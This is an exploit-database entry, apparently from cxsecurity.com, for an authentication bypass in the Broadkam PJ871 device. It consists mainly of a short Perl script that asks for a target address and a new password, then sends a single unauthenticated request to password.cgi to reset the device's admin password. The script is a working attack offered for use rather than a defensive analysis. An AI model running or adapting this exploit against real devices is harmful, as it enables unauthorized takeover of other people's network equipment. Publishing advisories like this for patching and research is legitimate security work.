Broadkam PJ871 Authentication Bypass

2013.07.26
Credit: d3c0der
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl #d3c0der use HTTP::Request; use LWP::UserAgent; print "= Target : "; $ip=<STDIN>; chomp $ip; print "= new password : "; $npass=<STDIN>; chomp $npass; if ( $ip !~ /^http:/ ) { $ip = 'http://' . $ip; } if ( $ip !~ /\/$/ ) { $ip = $ip . '/'; } print "\n"; print "->attacking , plz wait ! : $ip\n"; @path1=("password.cgi?sysPassword=$npass"); foreach $ways(@path1){ $final=$ip.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); } print "[-] password changed to $npass \n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top